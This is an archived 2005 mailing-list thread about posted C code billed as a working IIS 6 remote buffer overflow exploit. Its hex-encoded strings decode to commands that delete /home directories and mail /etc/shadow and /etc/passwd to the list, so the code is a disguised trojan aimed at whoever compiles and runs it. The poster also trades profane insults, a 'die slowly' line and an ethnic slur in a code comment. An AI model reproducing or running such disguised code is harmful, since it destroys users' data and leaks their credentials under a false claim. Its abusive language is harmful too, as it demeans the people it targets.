lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Thu Apr 21 01:09:03 2005
From: d4yj4y at yahoo.com (Day Jay)
Subject: FIXED CODE - IIS 6 Remote Buffer Overflow
	Exploit(was broken)

You are wrong again, it's "Smashing the Stick" you
moron. Not smashing the stack. Ask anyone here!

Man, you are such a newbie. Get a clue and stop trying
to say the sweet code is a backdoor just because you
don't know how to compile software properly. You're
nothing but a newbie wanna be C programmer with a dick
in his ass and a lack of hacking skills.

Die slowly kthxbye!


--- vulcanius <vulcanius@...il.com> wrote:

> Last time I checked it was Smashing the Stack, not
> Smashing the Stick
> moron. And why the hell do you keep reposting the
> code when everyone
> already knows it's a lame backdoor attempt?
> 
> On 4/20/05, Day Jay <d4yj4y@...oo.com> wrote:
> > Yes it is you hat squad lammer newbie. Now get it
> to
> > work!! You fucking newbie.
> > 
> > You're so lame and so is your file system.
> > 
> > --- "class101@...-SQUAD.com"
> <class101@...-squad.com>
> > wrote:
> > > perfect asshole
> > >
> > >
> >
>
-------------------------------------------------------------
> > > class101
> > > Jr. Researcher
> > > Hat-Squad.com
> > >
> >
>
-------------------------------------------------------------
> > > ----- Original Message -----
> > > From: "Day Jay" <d4yj4y@...oo.com>
> > > To: <full-disclosure@...ts.grok.org.uk>
> > > Sent: Wednesday, April 20, 2005 8:15 PM
> > > Subject: [Full-disclosure] FIXED CODE - IIS 6
> Remote
> > > Buffer Overflow
> > > Exploit(was broken)
> > >
> > >
> > > > Sorry, the previous code was broken. This code
> > > should
> > > > work...
> > > >
> > > > Happy Owning!! :)
> > > >
> > > >
> > > > =========SNIP============
> > > > /* Proof of concept code
> > > >     Please don't send us e-mails
> > > >     asking us "how to hack" because
> > > >     we will be forced to skullfsck you.
> > > >
> > > >  DISCLAIMER:
> > > >  !!NOT RESPONSIBLE WITH YOUR USE OF THIS
> CODE!!
> > > >
> > > >     IIS 6 Buffer Overflow Exploit
> > > >
> > > >     BUG: inetinfo.exe improperly bound checks
> > > >     http requests sent longer than 6998 chars.
> > > >     Can get messy but enough testing, and we
> have
> > > >     found a way in.
> > > >
> > > >     VENDOR STATUS: Notified
> > > >     FIX: In process
> > > >
> > > >     Remote root.
> > > >
> > > >     eg.
> > > >     #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
> > > >      + Connecting to host...
> > > >      + Connected.
> > > >      + Inserting Shellcode...
> > > >      + Done...
> > > >      + Spawining shell..
> > > >
> > > >      Microsoft Windows XP [Version 5.1.2600]
> > > >     (C) Copyright 1985-2001 Microsoft Corp.
> > > >     C:\
> > > >
> > > >
> > > >
> > > >  */
> > > >  char shellcode[] =
> > > >  "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> > > >  "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> > > >  "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> > > >  "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> > > >  "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> > > >  "\x68\x65\x68\x65";
> > > >
> > > >  char launcher [] =
> > > >  "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> > > >  "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> > > >  "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> > > >  "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> > > >  "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> > > >  "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> > > >
> > > >  char netcat_shell [] =
> > > >  "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> > > >  "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> > > >  "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> > > >  "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> > > >  "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> > > >  "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> > > >
> > > >
> > > >  main()
> > > >  {
> > > >
> > > >  file://Section Initialises designs
> implemented by
> > > mexicans
> > > >  file://Imigrate
> > > >  system(launcher);
> > > >  system(netcat_shell);
> > > >  system(shellcode);
> > > >
> > > >  file://int socket = 0;
> > > >  file://double long port = 0.0;
> > > >
> > > >  file://#DEFINE port host address
> > > >  file://#DEFINE number of inters
> > > >  file://#DEFINE gull eeuEE
> > > >
> > > >   //     for(int j; j < 30; j++)
> > > >          {
> > > >          file://Find socket remote address
> fault
> > > >          printf(".");
> > > >          }
> > > >  file://overtake inetinfo here IIS_666666^
> > > >  return 0;
> > > >  }
> > > >
> > > >
> __________________________________________________
> > > > Do You Yahoo!?
> > > > Tired of spam?  Yahoo! Mail has the best spam
> > > protection around
> > > > http://mail.yahoo.com
> > > >
> _______________________________________________
> > > > Full-Disclosure - We believe in it.
> > > > Charter:
> > >
> >
>
http://lists.grok.org.uk/full-disclosure-charter.html
> > > > Hosted and sponsored by Secunia -
> > > http://secunia.com/
> > >
> > >
> > 
> > __________________________________________________
> > Do You Yahoo!?
> > Tired of spam?  Yahoo! Mail has the best spam
> protection around
> > http://mail.yahoo.com
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
>
http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia -
> http://secunia.com/
> >
> 


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ